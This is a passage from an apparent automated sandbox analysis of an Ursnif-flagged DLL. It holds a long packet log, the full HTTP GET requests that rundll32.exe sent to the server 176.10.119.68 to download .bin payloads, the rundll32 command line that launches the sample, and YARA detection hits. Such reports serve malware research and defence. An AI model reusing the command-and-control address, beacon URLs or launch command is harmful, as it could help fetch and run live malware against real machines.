                          May 26, 2022 04:06:52.807344913 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807387114 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807415009 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807440042 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807463884 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807480097 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.807492018 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807513952 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807543039 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807543993 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.807574987 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.807580948 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807609081 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807612896 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.807630062 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.807640076 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.807662964 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.807699919 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822148085 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822185993 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822211027 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822228909 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822252989 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822278023 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822302103 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822309017 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822320938 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822370052 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822411060 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822509050 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822561026 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822586060 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822607040 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822612047 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822630882 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822638035 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822657108 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822763920 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822801113 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822827101 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822853088 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822875023 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822900057 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.822900057 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.822942019 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.823204041 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.823231936 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.823256969 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.823287010 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.823309898 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.823328018 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.823345900 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.823374033 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.823410034 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836559057 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836584091 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836602926 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836615086 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836632967 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836647987 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836664915 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836678982 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836697102 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836702108 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836714029 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836733103 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836735964 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836740017 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836751938 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836761951 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836771011 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836782932 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836797953 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836801052 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836816072 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836829901 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836833000 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836852074 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836867094 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836894989 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836906910 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836919069 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.836951017 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.836992979 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.850702047 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850744963 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850764990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850784063 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850800037 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850812912 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850830078 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850842953 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.850897074 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.850929976 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852664948 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852705956 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852727890 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852750063 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852771044 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852787018 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852798939 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852819920 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852833033 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852843046 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852861881 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852874041 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852893114 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852902889 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852926970 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852940083 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852961063 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.852971077 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.852993011 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.853002071 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.853017092 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.853024960 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.853045940 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.853059053 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.853095055 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.865576029 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865628004 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865655899 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865683079 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865709066 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865736008 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865752935 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.865772963 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.865792036 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865812063 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865853071 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.865901947 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865946054 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.865961075 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865988970 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.865998983 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866029024 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866055012 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866081953 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866092920 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866116047 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866131067 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866151094 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866168022 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866180897 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866226912 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866290092 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866317034 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866328955 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866350889 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866367102 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866388083 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.866405964 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.866425991 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.879981041 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880027056 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880048990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880072117 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880095005 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880117893 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880134106 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880161047 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880187988 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880209923 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880247116 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880270004 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880280018 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880300045 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880315065 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880337954 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880362988 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880377054 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880393028 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880410910 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880491018 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880517960 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880563021 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880588055 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880609035 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880635023 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880640984 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880666018 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880672932 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880691051 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.880697012 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880721092 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.880738974 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.884610891 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892374039 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892416000 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892438889 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892461061 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892491102 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892505884 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892543077 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892566919 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892585993 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892606974 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892664909 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892705917 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893610001 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893644094 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893671989 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893681049 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893690109 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893712044 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893721104 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893743038 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893752098 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893774986 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893780947 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893795967 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893811941 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893831015 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894366980 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894408941 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894433022 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894454002 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894471884 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894490004 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894506931 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894524097 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894541025 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894547939 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894565105 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894576073 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894594908 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894603014 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894627094 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894690990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894731998 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894741058 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894757032 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894768000 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894788027 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908045053 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908078909 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908101082 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908149958 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908165932 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908193111 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908202887 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908226013 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908236027 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908252954 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908274889 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908296108 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908459902 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908502102 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908524990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908544064 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908555031 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908596992 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908607006 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908626080 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908639908 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908670902 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908685923 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908791065 CEST8049752176.10.119.68192.168.2.3
                          • 176.10.119.68
                          Session ID:0
                          Source IP:192.168.2.3
                          Source Port:49752
                          Destination IP:176.10.119.68
                          Destination Port:80
                          Process:C:\Windows\SysWOW64\rundll32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          May 26, 2022 04:06:52.073632002 CEST | 1254 | OUT | GET /drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 176.10.119.68
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          May 26, 2022 04:06:52.343399048 CEST | 1256 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 May 2022 02:06:52 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 186009
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="628ee0bc50572.bin"
                          May 26, 2022 04:06:52.529841900 CEST | 1453 | OUT | GET /drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 176.10.119.68
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          May 26, 2022 04:06:52.807344913 CEST | 1455 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 May 2022 02:06:52 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 238749
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="628ee0bcc1763.bin"
                          May 26, 2022 04:06:53.058631897 CEST | 1707 | OUT | GET /drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 176.10.119.68
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          May 26, 2022 04:06:53.344055891 CEST | 1708 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 May 2022 02:06:53 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 1870
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="628ee0bd4ef97.bin"



                          Target ID:0
                          Start time:04:06:08
                          Start date:26/05/2022
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll"
                          Imagebase:0x2d0000
                          File size:116736 bytes
                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:1
                          Start time:04:06:08
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                          Imagebase:0xc20000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:2
                          Start time:04:06:09
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                          Imagebase:0xb70000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          Target ID:4
                          Start time:04:06:10
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
